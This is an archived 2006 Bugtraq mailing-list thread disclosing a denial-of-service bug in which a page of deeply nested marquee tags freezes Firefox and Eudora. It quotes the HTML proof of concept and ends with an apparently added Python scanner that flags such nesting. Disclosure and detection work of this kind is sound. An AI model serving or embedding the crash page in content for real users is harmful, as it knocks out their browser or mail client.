Open Source and information security mailing list archives
 
Message-ID: <6.2.1.2.0.20060605091637.0278b6f0@172.16.1.10>
Date: Mon, 05 Jun 2006 09:19:20 +0530
From: Sanjay Rawat <sanjayr@...oto.com>
To: <andy@....uk.com>, "'Josh Zlatin-Amishav'" <josh@...s.co.il>,
	<co296@....com>
Cc: <bugtraq@...urityfocus.com>
Subject: RE: Fire fox dos exploit


I have seen that the exploit also freezes Eudora 6.2.1.2. I was trying to 
open the original mail in the Eudora mail client, and whenever I clicked on 
the mail, Eudora stopped responding. I had to restart the application.

regards
-Sanjay Rawat

At 09:52 PM 5/31/2006, Andy wrote:
>Crashed my FF 1.5.0.3 straight away on a fully patched XP Pro Service Pack 2
>
>Andy
>
>-----Original Message-----
>From: Josh Zlatin-Amishav [mailto:josh@...s.co.il]
>Sent: 31 May 2006 16:50
>To: co296@....com
>Cc: bugtraq@...urityfocus.com
>Subject: Re: Fire fox dos exploit
>
>On Tue, 30 May 2006, co296@....com wrote:
>
> > I have found a problem which causes denial of service on fire fox browser
>
>Can you give us some more details, like versions and platforms affected? I
>was unable to recreate this flaw using firefox 1.5.dfsg+1.5.0 on Debian
>unstable.
>
>--
>   - Josh
>
> >
> > Credit to n00b for finding this bug..
> >
> > the problem lies in the
> >
> > <marquee> html tag uses 100% cpu and crashes the browser..
> >
> > Following proof of concept available
> >
> > <html>
> > <head>
> > <title>Credit to n00b..</title>
> > <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
> > </head>
> >
> > <body>
> >
><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><mar
>quee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee
> ><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><ma
>rquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marque
>e><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><m
>arquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marqu
>ee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><
>marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marq
>uee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></
>marquee></marquee></marquee></marquee></marquee></marquee></marquee></marque
>e></marquee></marquee></marquee></marquee></marquee></marquee></marquee></ma
>rquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marq
>  ue
> >
>e></marquee></marquee></marquee></marquee></marquee></marquee></marquee></ma
>rquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marq
>uee></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
> > </body>
> > </html>
> >
> >
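
The same-tag nesting used in the quoted proof of concept can be measured before a message body is handed to an HTML renderer, for example at a mail gateway. The following is an added example, not part of the original thread; the threshold of 8, the skipped-tag list and all function names are assumptions.

```python
from html.parser import HTMLParser

# Assumed policy value (not from the thread): flag any element nested inside
# itself more than this many levels deep.
MAX_SAME_TAG_DEPTH = 8

# Void elements and elements with an optional end tag cannot be depth-counted
# by matching start/end tags, so they are skipped (a simplification).
UNCOUNTED = frozenset(
    "area base br col embed hr img input link meta source track wbr "
    "p li dt dd tr td th option".split())


class NestingScanner(HTMLParser):
    """Record the deepest self-nesting seen for each element name."""

    def __init__(self):
        super().__init__()
        self.open_now = {}  # tag -> instances currently open
        self.peak = {}      # tag -> deepest self-nesting observed

    def handle_starttag(self, tag, attrs):
        if tag in UNCOUNTED:
            return
        depth = self.open_now.get(tag, 0) + 1
        self.open_now[tag] = depth
        self.peak[tag] = max(depth, self.peak.get(tag, 0))

    def handle_endtag(self, tag):
        # Ignore stray closers so malformed input cannot drive a count negative.
        if self.open_now.get(tag, 0) > 0:
            self.open_now[tag] -= 1


def scan_html(markup, limit=MAX_SAME_TAG_DEPTH):
    """Return {tag: peak_depth} for every tag nested deeper than limit."""
    scanner = NestingScanner()
    scanner.feed(markup)
    scanner.close()
    return {tag: d for tag, d in scanner.peak.items() if d > limit}


def should_quarantine(markup, limit=MAX_SAME_TAG_DEPTH):
    """True when the body should be withheld from the HTML renderer."""
    return bool(scan_html(markup, limit))


# Constructed samples: an ordinary body, a deeply nested one, and a body cut
# off before any closing tag (as happens when a mail is truncated in transit).
BENIGN = "<html><body><p>hi<br>there<br><MARQUEE>news</MARQUEE></body></html>"
NESTED = "<marquee>" * 40 + "x" + "</marquee>" * 40
TRUNCATED = "<marquee>" * 20
```

Because the parser lowercases element names, mixed-case tags are counted together, and unclosed tags still raise the peak depth.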


